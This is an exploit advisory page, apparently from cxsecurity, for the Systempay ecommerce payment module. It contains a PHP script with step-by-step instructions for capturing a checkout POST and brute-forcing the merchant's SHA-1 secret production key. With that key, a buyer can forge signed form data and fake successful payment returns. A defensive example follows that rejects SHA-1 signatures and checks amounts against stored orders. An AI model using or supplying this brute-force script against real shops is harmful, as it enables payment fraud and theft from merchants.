Ecommerce Systempay 1.0 Brute Force

2020.02.07
Credit: live3
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force
# Author: live3
# Date: 2020-02-05
# Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
# Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/
# Tested on: MacOs
# Version: ALL

<?php
/**
 *
 * INFORMATION
 * Exploit Title: Ecommerce Systempay decode secret production KEY / Brute Force
 * Author: live3
 * Date: 2020-02-05
 * Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
 * Tested on: MacOs
 * Version: ALL
 * Prerequisite: Find an ecommerce site that uses Systempay AND SHA1 to compute the signature.
 * Put some products in the cart and choose Systempay as the payment method.
 * Get all data from the POST sent to https://paiement.systempay.fr/vads-payment/
 * Keep the signature as reference and all vads fields to create a new signature.
 * Use the script to brute force the Secret product key (16 char length)
 *
 * Usage: Once you have the production KEY, all modifications to the form data will be accepted by Systempay! (You just generate a new signature with your changes)
 * You will be able to generate a successful payment return!
 *
 * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
 * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
 *
 */

// Set the start number you want (16 char length)
$last_key_check = '1000000000000000';

// Assign var
$array_key = array();
$sentence = '';
$how_many_key_to_check_for_loop = 10;

// Put here signature extract from POST DATA
// Example of SHA1 from string : test
$signature_from_post = 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3';

// Copy paste your content decoded of POST DATA
$form_data = '
vads_field_1: VALUE1
vads_field_2: VALUE2
// AND ALL OTHER FIELDS...
';

// Parse "name: value" lines into an array keyed by field name
$array = explode(PHP_EOL, $form_data);
foreach ($array as $data) {
    if ($data != '') {
        $elements = explode(': ', $data, 2);
        // Skip lines that are not "name: value" pairs (such as the placeholder comment)
        if (count($elements) === 2) {
            $array_key[trim($elements[0])] = $elements[1];
        }
    }
}

// The signed string is the field values, sorted by field name, each followed by '+'
ksort($array_key);
foreach ($array_key as $value) {
    $sentence .= $value . '+';
}

echo 'Signature from POST DATA : '.$signature_from_post.'<br/>';

$found = false;
$get_key = '';

// first check
if (sha1($sentence.$last_key_check) != $signature_from_post) {
    for ($i = $last_key_check; $i <= $last_key_check+$how_many_key_to_check_for_loop; $i++) {
        $get_key = $i;
        if (sha1($sentence.$i) == $signature_from_post) {
            echo 'Key found : '.$i.'<br/>';
            $found = true;
            break;
        }
    }
} else {
    // The start value itself matched; record it so the recomputed signature below is correct
    $get_key = $last_key_check;
    $found = true;
}

if ($found) {
    $test_sha = sha1($sentence.$get_key);
    echo 'Signature calc : '.$test_sha.'<br/><hr/>';
} else {
    echo 'Last key check : '.$get_key.'<br/><hr/>';
}

echo 'Your sequence : '.$sentence.'<br/>';
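The merchant-side counterpart to the script above, as an added example (not code from the original advisory or from Systempay): it classifies a signature as the SHA-1 style the script targets or as a base64 HMAC-SHA-256 value, rejects SHA-1 by default, compares in constant time and checks the amount against the stored order. The function names, sample fields and key are constructed, and the HMAC-SHA-256 layout (sorted `vads_` values joined with `+`, key appended, base64 of the raw HMAC) is an assumption to confirm against the gateway documentation.

```php
<?php
// Added example, not the advisory's code. Names, key and sample fields are constructed.

// Signature input as the script above builds it: vads_* values sorted by name, each followed by '+'.
function vads_sentence(array $fields): string
{
    ksort($fields);
    $sentence = '';
    foreach ($fields as $name => $value) {
        if (strncmp($name, 'vads_', 5) === 0) {
            $sentence .= $value . '+';
        }
    }
    return $sentence;
}

// Classify by shape: 40 hex chars = SHA-1 digest, 44 base64 chars = 32-byte HMAC-SHA-256.
function signature_scheme(string $sig): string
{
    if (preg_match('/^[0-9a-f]{40}\z/i', $sig)) return 'sha1';
    if (preg_match('#^[A-Za-z0-9+/]{43}=\z#', $sig)) return 'hmac-sha256';
    return 'unknown';
}

// Verify a payment return. A valid signature only proves knowledge of the key,
// so the amount is also compared with the order stored on the merchant side.
function verify_return(array $post, string $key, int $expected_amount, bool $allow_sha1 = false): bool
{
    $sig = (string)($post['signature'] ?? '');
    $sentence = vads_sentence($post);
    switch (signature_scheme($sig)) {
        case 'hmac-sha256': // assumed layout, confirm with the gateway documentation
            $calc = base64_encode(hash_hmac('sha256', $sentence . $key, $key, true));
            break;
        case 'sha1':
            if (!$allow_sha1) return false; // refuse the scheme the script above targets
            $calc = sha1($sentence . $key);
            break;
        default:
            return false;
    }
    return hash_equals($calc, $sig) && (int)($post['vads_amount'] ?? -1) === $expected_amount;
}

// Constructed sample return and key
$key = '0000000000000000';
$post = ['vads_amount' => '1500', 'vads_trans_id' => '000042'];
$post['signature'] = base64_encode(hash_hmac('sha256', vads_sentence($post) . $key, $key, true));
var_dump(verify_return($post, $key, 1500)); // amount matches the stored order
var_dump(verify_return($post, $key, 9900)); // amount differs from the stored order
```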



Copyright 2020, cxsecurity.com

 
